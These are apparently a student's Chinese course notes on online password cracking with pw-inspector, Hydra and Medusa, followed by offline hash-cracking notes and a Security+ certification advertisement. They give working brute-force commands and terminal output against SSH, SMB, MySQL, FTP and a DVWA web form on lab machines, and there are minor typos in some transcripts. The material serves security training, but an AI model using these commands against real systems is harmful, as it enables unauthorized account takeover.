|
在线密码破解-----hydra
pw-inspector
- 按长度和字符集筛选字典
- pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l
- pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u
密码破解效率
- 密码复杂度(字典命中率)
- 带宽、协议、服务器性能、客户端性能
- 锁定阈值
- 单位时间最大登陆请求次数
|
root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l
root@K:~# cat /usr/share/wordlists/nmap.lst
root@K:~# more p.lst
root@K:~# pw-inspector
PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]
Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s
Options:
-i FILE file to read passwords from (default: stdin)
-o FILE file to write valid passwords to (default: stdout)
-m MINLEN minimum length of a valid password
-M MAXLEN maximum length of a valid password
-c MINSETS the minimum number of sets required (default: all given)
Sets:
-l lowcase characters (a,b,c,d, etc.)
-u upcase characters (A,B,C,D, etc.)
-n numbers (1,2,3,4, etc.)
-p printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
-s special characters - all others not withint the sets above
PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.
root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5
root@K:~# more p.lst
|
在线密码破解-----medusa
Hydra的缺点
- 稳定性差,程序时常崩溃
- 速度控制不好,容易触发服务屏蔽或锁死机制
- 每主机新建进程,每服务新建实例
- 大量目标破解时性能差
Medusa的特点
- 稳定性好
- 速度控制得当
- 基于线程
- 支持模块少于hydra(不支持RDP )
- WEB-Form支持存在缺陷
|
root@k:~# medusa -h
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
medusa: option requires an argument -- 'h'
CRITICAL: Unknown error processing command-line options.
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan
oot@k:~# medusa -d
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
Available modules in "." :
Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
|
在线密码破解-----medusa
medusa -d
破解windows密码
- medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F
破解Linux SSH密码
- medusa -M ssh -h 192.168.20.10 -u root -P pass.lst -e ns -F
其他服务密码破解
- medusa -M mysql -h 1.1.1.1 -u root -P pass.lst -e ns -F
- medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m
FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-
DATA:"post?user=username&pas=password&Login=Login"
|
msfadmin@metasploitable:~$ sudo passwd root
[sudo] password for msfadmin:
Enter new UNIX password:
Retype new UNIX password:
No password supplied
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -F -u root -P /usr/share/wordlists/nmap.lst
root@K:~# grep 1234 /usr/share/wordlists/nmap.lst
root@K:~# grep ^1234% /usr/share/wordlists/nmap.lst
root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v #
root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v # > pass.lst
root@K:~# medusa -M ssh -h 192.168.1.113 -e ns -f -u root -P pass.lst
XP IP地址是192.168.1.118
C:\net user administrator zipper
root@K:~# medusa -M mebnt -h 192.168.1.118 -u administrator -P pass.lst -e ns -f
root@K:~# nmap P3306 192.168.1.113
Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST
Nmap scan report for 192.168.1.113
Host is up (10.00036s latency).
PORT STATE SERVOCE
3306/tcp open mysql
MAC Address: 08:00:27:B0:3A:76 (Oracle Virtualbox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
root@K:~# medusa -M mysql -h 192.168.1.113 -e ns -F -u root -P pass.lst
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of 5000 complete)
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password: [SUCCESS]
root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of 5000 complete)
ACCOUNT CHECK: [mysql] Host: 192.168.1.113 User: root Password: [SUCCESS]
root@K:~# medusa -M ftp -h 192.168.1.113 -e ns -F -u ftp -P pass.lst -n 2121
root@K:~# medusa -h 192.168.1.113 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code 302
ACCOUNT XGWXK: [web-form] Host: 192.168.1.113 (1 of, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)
root@K:~# medusa -M web-form -q
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms
Available module options:
USER-AGENT:? User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".
FORM:? Target form to request. Default: "/"
DENY-SIGNAL:? Authentication failure message. Attempt flagged as successful if text is not present in
server response. Default: "Login incorrect"
CUSTOM-HEADER:? Custom HTTP header.
More headers can be defined by using this option several times.
FORM-DATA:<METHOD>?<FIELDS>
Methods and fields to send to web service. Valid methods are GET and POST. The actual form
data to be submitted should also be defined here. Specifically, the fields: username and
password. The username field must be the first, followed by the password field.
Default: "post?username=&password="
Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"
-m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"
|
在线密码破解-----medusa
- -n : 非默认端口
- -s : 使用SSL连接
- -T : 并发主机数
medusa -M ftp -q
|
root@k:~# medusa -M ftp -q
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ftp.mod (2.1) pMonkey <pmonkey@foofus.net> :: Brute force module for FTP/FTPS sessions
Available module options:
MODE:? (NORMAL*, EXPLICIT, IMPLICIT)
EXPLICIT: AUTH TLS Mode as defined in RFC 4217
Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to
sending any credentials, however, an "AUTH TLS" command is issued and a
SSL session is negotiated.
IMPLICIT: FTP over SSL (990/tcp)
Implicit FTPS requires a SSL handshake to be performed before any FTP
commands are sent. This service typically resides on tcp/990. If the user
specifies this option or uses the "-n" (SSL) option, the module will
default to this mode and tcp/990.
NORMAL
The default behaviour if no MODE is specified. Authentication is attempted
in the clear. If the server requests encryption for the given user,
Explicit FTPS is utilized.
Example Usage:
medusa -M ftp -h host -u username -p password
medusa -M ftp -s -h host -u username -p password
medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password
(*) Default value
|
离线密码破解
身份认证
- 禁止明文传输密码
- 每次认证使用HASH算法加密密码传输)(HASH算法加密容易、解密困难)
- 服务器端用户数据库应加盐加密保存
破解思路
- 嗅探获取密码HASH
- 利用漏洞登录服务器并从用户数据库获取密码HASH
- 识别HASH类型
长度、字符集
- 利用李璇破解工具碰撞密码HASH
|
|
离线密码破解
优势
- 离线不会触发密码锁定机制
- 不会产生大量登录失败日志引起管理员注意
HASH识别工具
- hash-identifier
- Hashid
- 可能识别错误或无法识别
|
火狐插件hashr
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
| 
转播
